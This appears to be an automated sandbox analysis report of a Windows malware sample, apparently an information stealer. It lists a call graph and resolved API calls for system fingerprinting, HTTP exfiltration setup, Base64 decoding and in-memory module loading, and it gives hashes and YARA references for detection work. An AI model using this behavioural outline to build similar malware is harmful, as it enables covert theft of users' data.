15047->15048 15756 8b7690 GetProcessHeap RtlAllocateHeap 15048->15756 15051 8ba9b0 4 API calls 15052 8b1c2e 15051->15052 15053 8ba8a0 lstrcpy 15052->15053 15054 8b1c37 15053->15054 15055 8ba9b0 4 API calls 15054->15055 15056 8b1c56 15055->15056 15057 8ba8a0 lstrcpy 15056->15057 15058 8b1c5f 15057->15058 15059 8ba9b0 4 API calls 15058->15059 15060 8b1c80 15059->15060 15061 8ba8a0 lstrcpy 15060->15061 15062 8b1c89 15061->15062 15763 8b77c0 GetCurrentProcess IsWow64Process 15062->15763 15065 8ba9b0 4 API calls 15066 8b1ca9 15065->15066 15067 8ba8a0 lstrcpy 15066->15067 15068 8b1cb2 15067->15068 15069 8ba9b0 4 API calls 15068->15069 15070 8b1cd1 15069->15070 15071 8ba8a0 lstrcpy 15070->15071 15072 8b1cda 15071->15072 15073 8ba9b0 4 API calls 15072->15073 15074 8b1cfb 15073->15074 15075 8ba8a0 lstrcpy 15074->15075 15076 8b1d04 15075->15076 15077 8b7850 3 API calls 15076->15077 15078 8b1d14 15077->15078 15079 8ba9b0 4 API calls 15078->15079 15080 8b1d24 15079->15080 15081 8ba8a0 lstrcpy 15080->15081 15082 8b1d2d 15081->15082 15083 8ba9b0 4 API calls 15082->15083 15084 8b1d4c 15083->15084 15085 8ba8a0 lstrcpy 15084->15085 15086 8b1d55 15085->15086 15087 8ba9b0 4 API calls 15086->15087 15088 8b1d75 15087->15088 15089 8ba8a0 lstrcpy 15088->15089 15090 8b1d7e 15089->15090 15091 8b78e0 3 API calls 15090->15091 15092 8b1d8e 15091->15092 15093 8ba9b0 4 API calls 15092->15093 15094 8b1d9e 15093->15094 15095 8ba8a0 lstrcpy 15094->15095 15096 8b1da7 15095->15096 15097 8ba9b0 4 API calls 15096->15097 15098 8b1dc6 15097->15098 15099 8ba8a0 lstrcpy 15098->15099 15100 8b1dcf 15099->15100 15101 8ba9b0 4 API calls 15100->15101 15102 8b1df0 15101->15102 15103 8ba8a0 lstrcpy 15102->15103 15104 8b1df9 15103->15104 15765 8b7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15104->15765 15107 8ba9b0 4 API calls 15108 8b1e19 15107->15108 15109 8ba8a0 lstrcpy 15108->15109 15110 8b1e22 15109->15110 15111 8ba9b0 4 API calls 15110->15111 15112 8b1e41 15111->15112 15113 8ba8a0 lstrcpy 15112->15113 15114 8b1e4a 15113->15114 15115 8ba9b0 4 API calls 15114->15115 15116 8b1e6b 15115->15116 15117 8ba8a0 lstrcpy 15116->15117 15118 8b1e74 15117->15118 15767 8b7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15118->15767 15121 8ba9b0 4 API calls 15122 8b1e94 15121->15122 15123 8ba8a0 lstrcpy 15122->15123 15124 8b1e9d 15123->15124 15125 8ba9b0 4 API calls 15124->15125 15126 8b1ebc 15125->15126 15127 8ba8a0 lstrcpy 15126->15127 15128 8b1ec5 15127->15128 15129 8ba9b0 4 API calls 15128->15129 15130 8b1ee5 15129->15130 15131 8ba8a0 lstrcpy 15130->15131 15132 8b1eee 15131->15132 15770 8b7b00 GetUserDefaultLocaleName 15132->15770 15135 8ba9b0 4 API calls 15136 8b1f0e 15135->15136 15137 8ba8a0 lstrcpy 15136->15137 15138 8b1f17 15137->15138 15139 8ba9b0 4 API calls 15138->15139 15140 8b1f36 15139->15140 15141 8ba8a0 lstrcpy 15140->15141 15142 8b1f3f 15141->15142 15143 8ba9b0 4 API calls 15142->15143 15144 8b1f60 15143->15144 15145 8ba8a0 lstrcpy 15144->15145 15146 8b1f69 15145->15146 15774 8b7b90 15146->15774 15148 8b1f80 15149 8ba920 3 API calls 15148->15149 15150 8b1f93 15149->15150 15151 8ba8a0 lstrcpy 15150->15151 15152 8b1f9c 15151->15152 15153 8ba9b0 4 API calls 15152->15153 15154 8b1fc6 15153->15154 15155 8ba8a0 lstrcpy 15154->15155 15156 8b1fcf 15155->15156 15157 8ba9b0 4 API calls 15156->15157 15158 8b1fef 15157->15158 15159 8ba8a0 lstrcpy 15158->15159 15160 8b1ff8 15159->15160 15786 8b7d80 GetSystemPowerStatus 15160->15786 15163 8ba9b0 4 API calls 15164 8b2018 15163->15164 15165 8ba8a0 lstrcpy 15164->15165 15166 8b2021 15165->15166 15167 8ba9b0 4 API calls 15166->15167 15168 8b2040 15167->15168 15169 8ba8a0 lstrcpy 15168->15169 15170 8b2049 15169->15170 15171 8ba9b0 4 API calls 15170->15171 15172 8b206a 15171->15172 15173 8ba8a0 lstrcpy 15172->15173 15174 8b2073 15173->15174 15175 8b207e GetCurrentProcessId 15174->15175 15788 8b9470 OpenProcess 15175->15788 15178 8ba920 3 API calls 15179 8b20a4 15178->15179 15180 8ba8a0 lstrcpy 15179->15180 15181 8b20ad 15180->15181 15182 8ba9b0 4 API calls 15181->15182 15183 8b20d7 15182->15183 15184 8ba8a0 lstrcpy 15183->15184 15185 8b20e0 15184->15185 15186 8ba9b0 4 API calls 15185->15186 15187 8b2100 15186->15187 15188 8ba8a0 lstrcpy 15187->15188 15189 8b2109 15188->15189 15793 8b7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15189->15793 15192 8ba9b0 4 API calls 15193 8b2129 15192->15193 15194 8ba8a0 lstrcpy 15193->15194 15195 8b2132 15194->15195 15196 8ba9b0 4 API calls 15195->15196 15197 8b2151 15196->15197 15198 8ba8a0 lstrcpy 15197->15198 15199 8b215a 15198->15199 15200 8ba9b0 4 API calls 15199->15200 15201 8b217b 15200->15201 15202 8ba8a0 lstrcpy 15201->15202 15203 8b2184 15202->15203 15797 8b7f60 15203->15797 15206 8ba9b0 4 API calls 15207 8b21a4 15206->15207 15208 8ba8a0 lstrcpy 15207->15208 15209 8b21ad 15208->15209 15210 8ba9b0 4 API calls 15209->15210 15211 8b21cc 15210->15211 15212 8ba8a0 lstrcpy 15211->15212 15213 8b21d5 15212->15213 15214 8ba9b0 4 API calls 15213->15214 15215 8b21f6 15214->15215 15216 8ba8a0 lstrcpy 15215->15216 15217 8b21ff 15216->15217 15810 8b7ed0 GetSystemInfo wsprintfA 15217->15810 15220 8ba9b0 4 API calls 15221 8b221f 15220->15221 15222 8ba8a0 lstrcpy 15221->15222 15223 8b2228 15222->15223 15224 8ba9b0 4 API calls 15223->15224 15225 8b2247 15224->15225 15226 8ba8a0 lstrcpy 15225->15226 15227 8b2250 15226->15227 15228 8ba9b0 4 API calls 15227->15228 15229 8b2270 15228->15229 15230 8ba8a0 lstrcpy 15229->15230 15231 8b2279 15230->15231 15812 8b8100 GetProcessHeap RtlAllocateHeap 15231->15812 15234 8ba9b0 4 API calls 15235 8b2299 15234->15235 15236 8ba8a0 lstrcpy 15235->15236 15237 8b22a2 15236->15237 15238 8ba9b0 4 API calls 15237->15238 15239 8b22c1 15238->15239 15240 8ba8a0 lstrcpy 15239->15240 15241 8b22ca 15240->15241 15242 8ba9b0 4 API calls 15241->15242 15243 8b22eb 15242->15243 15244 8ba8a0 lstrcpy 15243->15244 15245 8b22f4 15244->15245 15818 8b87c0 15245->15818 15248 8ba920 3 API calls 15249 8b231e 15248->15249 15250 8ba8a0 lstrcpy 15249->15250 15251 8b2327 15250->15251 15252 8ba9b0 4 API calls 15251->15252 15253 8b2351 15252->15253 15254 8ba8a0 lstrcpy 15253->15254 15255 8b235a 15254->15255 15256 8ba9b0 4 API calls 15255->15256 15257 8b237a 15256->15257 15258 8ba8a0 lstrcpy 15257->15258 15259 8b2383 15258->15259 15260 8ba9b0 4 API calls 15259->15260 15261 8b23a2 15260->15261 15262 8ba8a0 lstrcpy 15261->15262 15263 8b23ab 15262->15263 15823 8b81f0 15263->15823 15265 8b23c2 15266 8ba920 3 API calls 15265->15266 15267 8b23d5 15266->15267 15268 8ba8a0 lstrcpy 15267->15268 15269 8b23de 15268->15269 15270 8ba9b0 4 API calls 15269->15270 15271 8b240a 15270->15271 15272 8ba8a0 lstrcpy 15271->15272 15273 8b2413 15272->15273 15274 8ba9b0 4 API calls 15273->15274 15275 8b2432 15274->15275 15276 8ba8a0 lstrcpy 15275->15276 15277 8b243b 15276->15277 15278 8ba9b0 4 API calls 15277->15278 15279 8b245c 15278->15279 15280 8ba8a0 lstrcpy 15279->15280 15281 8b2465 15280->15281 15282 8ba9b0 4 API calls 15281->15282 15283 8b2484 15282->15283 15284 8ba8a0 lstrcpy 15283->15284 15285 8b248d 15284->15285 15286 8ba9b0 4 API calls 15285->15286 15287 8b24ae 15286->15287 15288 8ba8a0 lstrcpy 15287->15288 15289 8b24b7 15288->15289 15831 8b8320 15289->15831 15291 8b24d3 15292 8ba920 3 API calls 15291->15292 15293 8b24e6 15292->15293 15294 8ba8a0 lstrcpy 15293->15294 15295 8b24ef 15294->15295 15296 8ba9b0 4 API calls 15295->15296 15297 8b2519 15296->15297 15298 8ba8a0 lstrcpy 15297->15298 15299 8b2522 15298->15299 15300 8ba9b0 4 API calls 15299->15300 15301 8b2543 15300->15301 15302 8ba8a0 lstrcpy 15301->15302 15303 8b254c 15302->15303 15304 8b8320 17 API calls 15303->15304 15305 8b2568 15304->15305 15306 8ba920 3 API calls 15305->15306 15307 8b257b 15306->15307 15308 8ba8a0 lstrcpy 15307->15308 15309 8b2584 15308->15309 15310 8ba9b0 4 API calls 15309->15310 15311 8b25ae 15310->15311 15312 8ba8a0 lstrcpy 15311->15312 15313 8b25b7 15312->15313 15314 8ba9b0 4 API calls 15313->15314 15315 8b25d6 15314->15315 15316 8ba8a0 lstrcpy 15315->15316 15317 8b25df 15316->15317 15318 8ba9b0 4 API calls 15317->15318 15319 8b2600 15318->15319 15320 8ba8a0 lstrcpy 15319->15320 15321 8b2609 15320->15321 15867 8b8680 15321->15867 15323 8b2620 15324 8ba920 3 API calls 15323->15324 15325 8b2633 15324->15325 15326 8ba8a0 lstrcpy 15325->15326 15327 8b263c 15326->15327 15328 8b265a lstrlen 15327->15328 15329 8b266a 15328->15329 15330 8ba740 lstrcpy 15329->15330 15331 8b267c 15330->15331 15332 8a1590 lstrcpy 15331->15332 15333 8b268d 15332->15333 15877 8b5190 15333->15877 15335 8b2699 15335->13767 16065 8baad0 15336->16065 15338 8a5009 InternetOpenUrlA 15342 8a5021 15338->15342 15339 8a502a InternetReadFile 15339->15342 15340 8a50a0 InternetCloseHandle InternetCloseHandle 15341 8a50ec 15340->15341 15341->13771 15342->15339 15342->15340 16066 8a98d0 15343->16066 15345 8b0759 15346 8b0a38 15345->15346 15347 8b077d 15345->15347 15348 8a1590 lstrcpy 15346->15348 15350 8b0799 StrCmpCA 15347->15350 15349 8b0a49 15348->15349 16242 8b0250 15349->16242 15352 8b0843 15350->15352 15353 8b07a8 15350->15353 15356 8b0865 StrCmpCA 15352->15356 15355 8ba7a0 lstrcpy 15353->15355 15357 8b07c3 15355->15357 15358 8b0874 15356->15358 15395 8b096b 15356->15395 15359 8a1590 lstrcpy 15357->15359 15360 8ba740 lstrcpy 15358->15360 15361 8b080c 15359->15361 15363 8b0881 15360->15363 15364 8ba7a0 lstrcpy 15361->15364 15362 8b099c StrCmpCA 15365 8b09ab 15362->15365 15366 8b0a2d 15362->15366 15367 8ba9b0 4 API calls 15363->15367 15368 8b0823 15364->15368 15369 8a1590 lstrcpy 15365->15369 15366->13775 15370 8b08ac 15367->15370 15371 8ba7a0 lstrcpy 15368->15371 15372 8b09f4 15369->15372 15373 8ba920 3 API calls 15370->15373 15374 8b083e 15371->15374 15375 8ba7a0 lstrcpy 15372->15375 15376 8b08b3 15373->15376 16069 8afb00 15374->16069 15378 8b0a0d 15375->15378 15379 8ba9b0 4 API calls 15376->15379 15380 8ba7a0 lstrcpy 15378->15380 15381 8b08ba 15379->15381 15382 8b0a28 15380->15382 15395->15362 15717 8ba7a0 lstrcpy 15716->15717 15718 8a1683 15717->15718 15719 8ba7a0 lstrcpy 15718->15719 15720 8a1695 15719->15720 15721 8ba7a0 lstrcpy 15720->15721 15722 8a16a7 15721->15722 15723 8ba7a0 lstrcpy 15722->15723 15724 8a15a3 15723->15724 15724->14598 15726 8a47c6 15725->15726 15727 8a4838 lstrlen 15726->15727 15751 8baad0 15727->15751 15729 8a4848 InternetCrackUrlA 15730 8a4867 15729->15730 15730->14675 15732 8ba740 lstrcpy 15731->15732 15733 8b8b74 15732->15733 15734 8ba740 lstrcpy 15733->15734 15735 8b8b82 GetSystemTime 15734->15735 15737 8b8b99 15735->15737 15736 8ba7a0 lstrcpy 15738 8b8bfc 15736->15738 15737->15736 15738->14690 15740 8ba931 15739->15740 15741 8ba988 15740->15741 15743 8ba968 lstrcpy lstrcat 15740->15743 15742 8ba7a0 lstrcpy 15741->15742 15744 8ba994 15742->15744 15743->15741 15744->14693 15745->14808 15747 8a4eee 15746->15747 15748 8a9af9 LocalAlloc 15746->15748 15747->14696 15747->14698 15748->15747 15749 8a9b14 CryptStringToBinaryA 15748->15749 15749->15747 15750 8a9b39 LocalFree 15749->15750 15750->15747 15751->15729 15752->14818 15753->14959 15754->14961 15755->14969 15884 8b77a0 15756->15884 15759 8b1c1e 15759->15051 15760 8b76c6 RegOpenKeyExA 15761 8b76e7 RegQueryValueExA 15760->15761 15762 8b7704 RegCloseKey 15760->15762 15761->15762 15762->15759 15764 8b1c99 15763->15764 15764->15065 15766 8b1e09 15765->15766 15766->15107 15768 8b7a9a wsprintfA 15767->15768 15769 8b1e84 15767->15769 15768->15769 15769->15121 15771 8b7b4d 15770->15771 15772 8b1efe 15770->15772 15891 8b8d20 LocalAlloc CharToOemW 15771->15891 15772->15135 15775 8ba740 lstrcpy 15774->15775 15776 8b7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15775->15776 15785 8b7c25 15776->15785 15777 8b7d18 15779 8b7d28 15777->15779 15780 8b7d1e LocalFree 15777->15780 15778 8b7c46 GetLocaleInfoA 15778->15785 15781 8ba7a0 lstrcpy 15779->15781 15780->15779 15784 8b7d37 15781->15784 15782 8ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15782->15785 15783 8ba8a0 lstrcpy 15783->15785 15784->15148 15785->15777 15785->15778 15785->15782 15785->15783 15787 8b2008 15786->15787 15787->15163 15789 8b9493 GetModuleFileNameExA CloseHandle 15788->15789 15790 8b94b5 15788->15790 15789->15790 15791 8ba740 lstrcpy 15790->15791 15792 8b2091 15791->15792 15792->15178 15794 8b7e68 RegQueryValueExA 15793->15794 15795 8b2119 15793->15795 15796 8b7e8e RegCloseKey 15794->15796 15795->15192 15796->15795 15798 8b7fb9 GetLogicalProcessorInformationEx 15797->15798 15799 8b7fd8 GetLastError 15798->15799 15803 8b8029 15798->15803 15807 8b8022 15799->15807 15809 8b7fe3 15799->15809 15802 8b89f0 2 API calls 15805 8b2194 15802->15805 15804 8b89f0 2 API calls 15803->15804 15806 8b807b 15804->15806 15805->15206 15806->15807 15808 8b8084 wsprintfA 15806->15808 15807->15802 15807->15805 15808->15805 15809->15798 15809->15805 15892 8b89f0 15809->15892 15895 8b8a10 GetProcessHeap RtlAllocateHeap 15809->15895 15811 8b220f 15810->15811 15811->15220 15813 8b89b0 15812->15813 15814 8b814d GlobalMemoryStatusEx 15813->15814 15815 8b8163 __aulldiv 15814->15815 15816 8b819b wsprintfA 15815->15816 15817 8b2289 15816->15817 15817->15234 15819 8b87fb GetProcessHeap RtlAllocateHeap wsprintfA 15818->15819 15821 8ba740 lstrcpy 15819->15821 15822 8b230b 15821->15822 15822->15248 15824 8ba740 lstrcpy 15823->15824 15826 8b8229 15824->15826 15825 8b8263 15827 8ba7a0 lstrcpy 15825->15827 15826->15825 15829 8ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15826->15829 15830 8ba8a0 lstrcpy 15826->15830 15828 8b82dc 15827->15828 15828->15265 15829->15826 15830->15826 15832 8ba740 lstrcpy 15831->15832 15833 8b835c RegOpenKeyExA 15832->15833 15834 8b83ae 15833->15834 15835 8b83d0 15833->15835 15836 8ba7a0 lstrcpy 15834->15836 15837 8b83f8 RegEnumKeyExA 15835->15837 15838 8b8613 RegCloseKey 15835->15838 15848 8b83bd 15836->15848 15840 8b843f wsprintfA RegOpenKeyExA 15837->15840 15841 8b860e 15837->15841 15839 8ba7a0 lstrcpy 15838->15839 15839->15848 15842 8b84c1 RegQueryValueExA 15840->15842 15843 8b8485 RegCloseKey RegCloseKey 15840->15843 15841->15838 15845 8b84fa lstrlen 15842->15845 15846 8b8601 RegCloseKey 15842->15846 15844 8ba7a0 lstrcpy 15843->15844 15844->15848 15845->15846 15847 8b8510 15845->15847 15846->15841 15849 8ba9b0 4 API calls 15847->15849 15848->15291 15850 8b8527 15849->15850 15851 8ba8a0 lstrcpy 15850->15851 15852 8b8533 15851->15852 15853 8ba9b0 4 API calls 15852->15853 15854 8b8557 15853->15854 15855 8ba8a0 lstrcpy 15854->15855 15856 8b8563 15855->15856 15857 8b856e RegQueryValueExA 15856->15857 15857->15846 15858 8b85a3 15857->15858 15859 8ba9b0 4 API calls 15858->15859 15860 8b85ba 15859->15860 15861 8ba8a0 lstrcpy 15860->15861 15862 8b85c6 15861->15862 15863 8ba9b0 4 API calls 15862->15863 15864 8b85ea 15863->15864 15865 8ba8a0 lstrcpy 15864->15865 15866 8b85f6 15865->15866 15866->15846 15868 8ba740 lstrcpy 15867->15868 15869 8b86bc CreateToolhelp32Snapshot Process32First 15868->15869 15870 8b86e8 Process32Next 15869->15870 15871 8b875d CloseHandle 15869->15871 15870->15871 15876 8b86fd 15870->15876 15872 8ba7a0 lstrcpy 15871->15872 15875 8b8776 15872->15875 15873 8ba9b0 lstrcpy lstrlen lstrcpy lstrcat 15873->15876 15874 8ba8a0 lstrcpy 15874->15876 15875->15323 15876->15870 15876->15873 15876->15874 15878 8ba7a0 lstrcpy 15877->15878 15879 8b51b5 15878->15879 15880 8a1590 lstrcpy 15879->15880 15881 8b51c6 15880->15881 15896 8a5100 15881->15896 15883 8b51cf 15883->15335 15887 8b7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15884->15887 15886 8b76b9 15886->15759 15886->15760 15888 8b7780 RegCloseKey 15887->15888 15889 8b7765 RegQueryValueExA 15887->15889 15890 8b7793 15888->15890 15889->15888 15890->15886 15891->15772 15893 8b89f9 GetProcessHeap HeapFree 15892->15893 15894 8b8a0c 15892->15894 15893->15894 15894->15809 15895->15809 15897 8ba7a0 lstrcpy 15896->15897 15898 8a5119 15897->15898 15899 8a47b0 2 API calls 15898->15899 15900 8a5125 15899->15900 16056 8b8ea0 15900->16056 15902 8a5184 15903 8a5192 lstrlen 15902->15903 15904 8a51a5 15903->15904 15905 8b8ea0 4 API calls 15904->15905 15906 8a51b6 15905->15906 15907 8ba740 lstrcpy 15906->15907 15908 8a51c9 15907->15908 15909 8ba740 lstrcpy 15908->15909 15910 8a51d6 15909->15910 15911 8ba740 lstrcpy 15910->15911 15912 8a51e3 15911->15912 15913 8ba740 lstrcpy 15912->15913 15914 8a51f0 15913->15914 15915 8ba740 lstrcpy 15914->15915 15916 8a51fd InternetOpenA StrCmpCA 15915->15916 15917 8a522f 15916->15917 15918 8a58c4 InternetCloseHandle 15917->15918 15919 8b8b60 3 API calls 15917->15919 15925 8a58d9 codecvt 15918->15925 15920 8a524e 15919->15920 15921 8ba920 3 API calls 15920->15921 15922 8a5261 15921->15922 15923 8ba8a0 lstrcpy 15922->15923 15924 8a526a 15923->15924 15926 8ba9b0 4 API calls 15924->15926 15928 8ba7a0 lstrcpy 15925->15928 15927 8a52ab 15926->15927 15929 8ba920 3 API calls 15927->15929 15937 8a5913 15928->15937 15930 8a52b2 15929->15930 15931 8ba9b0 4 API calls 15930->15931 15932 8a52b9 15931->15932 15933 8ba8a0 lstrcpy 15932->15933 15934 8a52c2 15933->15934 15935 8ba9b0 4 API calls 15934->15935 15936 8a5303 15935->15936 15938 8ba920 3 API calls 15936->15938 15937->15883 15939 8a530a 15938->15939 15940 8ba8a0 lstrcpy 15939->15940 15941 8a5313 15940->15941 15942 8a5329 InternetConnectA 15941->15942 15942->15918 15943 8a5359 HttpOpenRequestA 15942->15943 15945 8a58b7 InternetCloseHandle 15943->15945 15946 8a53b7 15943->15946 15945->15918 15947 8ba9b0 4 API calls 15946->15947 15948 8a53cb 15947->15948 15949 8ba8a0 lstrcpy 15948->15949 15950 8a53d4 15949->15950 15951 8ba920 3 API calls 15950->15951 15952 8a53f2 15951->15952 15953 8ba8a0 lstrcpy 15952->15953 15954 8a53fb 15953->15954 15955 8ba9b0 4 API calls 15954->15955 15956 8a541a 15955->15956 15957 8ba8a0 lstrcpy 15956->15957 15958 8a5423 15957->15958 15959 8ba9b0 4 API calls 15958->15959 15960 8a5444 15959->15960 15961 8ba8a0 lstrcpy 15960->15961 15962 8a544d 15961->15962 15963 8ba9b0 4 API calls 15962->15963 15964 8a546e 15963->15964 16057 8b8ead CryptBinaryToStringA 16056->16057 16061 8b8ea9 16056->16061 16058 8b8ece GetProcessHeap RtlAllocateHeap 16057->16058 16057->16061 16059 8b8ef4 codecvt 16058->16059 16058->16061 16060 8b8f05 CryptBinaryToStringA 16059->16060 16060->16061 16061->15902 16065->15338 16308 8a9880 16066->16308 16068 8a98e1 16068->15345 16070 8ba740 lstrcpy 16069->16070 16243 8ba740 lstrcpy 16242->16243 16244 8b0266 16243->16244 16245 8b8de0 2 API calls 16244->16245 16246 8b027b 16245->16246 16247 8ba920 3 API calls 16246->16247 16248 8b028b 16247->16248 16249 8ba8a0 lstrcpy 16248->16249 16250 8b0294 16249->16250 16251 8ba9b0 4 API calls 16250->16251 16309 8a988d 16308->16309 16312 8a6fb0 16309->16312 16311 8a98ad codecvt 16311->16068 16315 8a6d40 16312->16315 16316 8a6d63 16315->16316 16326 8a6d59 16315->16326 16331 8a6530 16316->16331 16320 8a6dbe 16320->16326 16341 8a69b0 16320->16341 16322 8a6e2a 16323 8a6ee6 VirtualFree 16322->16323 16325 8a6ef7 16322->16325 16322->16326 16323->16325 16324 8a6f41 16324->16326 16327 8b89f0 2 API calls 16324->16327 16325->16324 16328 8a6f38 16325->16328 16329 8a6f26 FreeLibrary 16325->16329 16326->16311 16327->16326 16330 8b89f0 2 API calls 16328->16330 16329->16325 16330->16324 16332 8a6542 16331->16332 16334 8a6549 16332->16334 16351 8b8a10 GetProcessHeap RtlAllocateHeap 16332->16351 16334->16326 16335 8a6660 16334->16335 16340 8a668f VirtualAlloc 16335->16340 16337 8a6730 16338 8a673c 16337->16338 16339 8a6743 VirtualAlloc 16337->16339 16338->16320 16339->16338 16340->16337 16340->16338 16342 8a69c9 16341->16342 16346 8a69d5 16341->16346 16343 8a6a09 LoadLibraryA 16342->16343 16342->16346 16344 8a6a32 16343->16344 16343->16346 16348 8a6ae0 16344->16348 16352 8b8a10 GetProcessHeap RtlAllocateHeap 16344->16352 16346->16322 16347 8a6ba8 GetProcAddress 16347->16346 16347->16348 16348->16346 16348->16347 16349 8b89f0 2 API calls 16349->16348 16350 8a6a8b 16350->16346 16350->16349 16351->16334 16352->16350

                              Executed Functions

                              Function 008B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 8b9860-8b9874 call 8b9750 663 8b987a-8b9a8e call 8b9780 GetProcAddress * 21 660->663 664 8b9a93-8b9af2 LoadLibraryA * 5 660->664 663->664 666 8b9b0d-8b9b14 664->666 667 8b9af4-8b9b08 GetProcAddress 664->667 669 8b9b46-8b9b4d 666->669 670 8b9b16-8b9b41 GetProcAddress * 2 666->670 667->666 671 8b9b68-8b9b6f 669->671 672 8b9b4f-8b9b63 GetProcAddress 669->672 670->669 673 8b9b89-8b9b90 671->673 674 8b9b71-8b9b84 GetProcAddress 671->674 672->671 675 8b9b92-8b9bbc GetProcAddress * 2 673->675 676 8b9bc1-8b9bc2 673->676 674->673 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01420408), ref: 008B98A1
                              • GetProcAddress.KERNEL32(75900000,01420618), ref: 008B98BA
                              • GetProcAddress.KERNEL32(75900000,01420630), ref: 008B98D2
                              • GetProcAddress.KERNEL32(75900000,01420678), ref: 008B98EA
                              • GetProcAddress.KERNEL32(75900000,014206A8), ref: 008B9903
                              • GetProcAddress.KERNEL32(75900000,014286D0), ref: 008B991B
                              • GetProcAddress.KERNEL32(75900000,01415D48), ref: 008B9933
                              • GetProcAddress.KERNEL32(75900000,01415B88), ref: 008B994C
                              • GetProcAddress.KERNEL32(75900000,01420420), ref: 008B9964
                              • GetProcAddress.KERNEL32(75900000,014204E0), ref: 008B997C
                              • GetProcAddress.KERNEL32(75900000,014203F0), ref: 008B9995
                              • GetProcAddress.KERNEL32(75900000,01420540), ref: 008B99AD
                              • GetProcAddress.KERNEL32(75900000,01415AC8), ref: 008B99C5
                              • GetProcAddress.KERNEL32(75900000,01420468), ref: 008B99DE
                              • GetProcAddress.KERNEL32(75900000,014204F8), ref: 008B99F6
                              • GetProcAddress.KERNEL32(75900000,01415C68), ref: 008B9A0E
                              • GetProcAddress.KERNEL32(75900000,01420558), ref: 008B9A27
                              • GetProcAddress.KERNEL32(75900000,01420720), ref: 008B9A3F
                              • GetProcAddress.KERNEL32(75900000,01415E08), ref: 008B9A57
                              • GetProcAddress.KERNEL32(75900000,01420768), ref: 008B9A70
                              • GetProcAddress.KERNEL32(75900000,01415E48), ref: 008B9A88
                              • LoadLibraryA.KERNEL32(014206F0,?,008B6A00), ref: 008B9A9A
                              • LoadLibraryA.KERNEL32(01420750,?,008B6A00), ref: 008B9AAB
                              • LoadLibraryA.KERNEL32(014206D8,?,008B6A00), ref: 008B9ABD
                              • LoadLibraryA.KERNEL32(01420780,?,008B6A00), ref: 008B9ACF
                              • LoadLibraryA.KERNEL32(01420738,?,008B6A00), ref: 008B9AE0
                              • GetProcAddress.KERNEL32(75070000,01420708), ref: 008B9B02
                              • GetProcAddress.KERNEL32(75FD0000,01420798), ref: 008B9B23
                              • GetProcAddress.KERNEL32(75FD0000,01428C70), ref: 008B9B3B
                              • GetProcAddress.KERNEL32(75A50000,01428D48), ref: 008B9B5D
                              • GetProcAddress.KERNEL32(74E50000,01415E28), ref: 008B9B7E
                              • GetProcAddress.KERNEL32(76E80000,01428730), ref: 008B9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 008B9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 008B9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
                              • Instruction ID: e450105993da072694e0b4033423b9389cf2544a5416fdbc51f738f8ad5950f6
                              • Opcode Fuzzy Hash: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
                              • Instruction Fuzzy Hash: 64A11EBA5002C09FD354EFE8EDD89563BF9F76C301715851EA605CB264D639B883CB62
                              Function 008A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 8a45c0-8a4695 RtlAllocateHeap 781 8a46a0-8a46a6 764->781 782 8a474f-8a47a9 VirtualProtect 781->782 783 8a46ac-8a474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008A479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A46CD
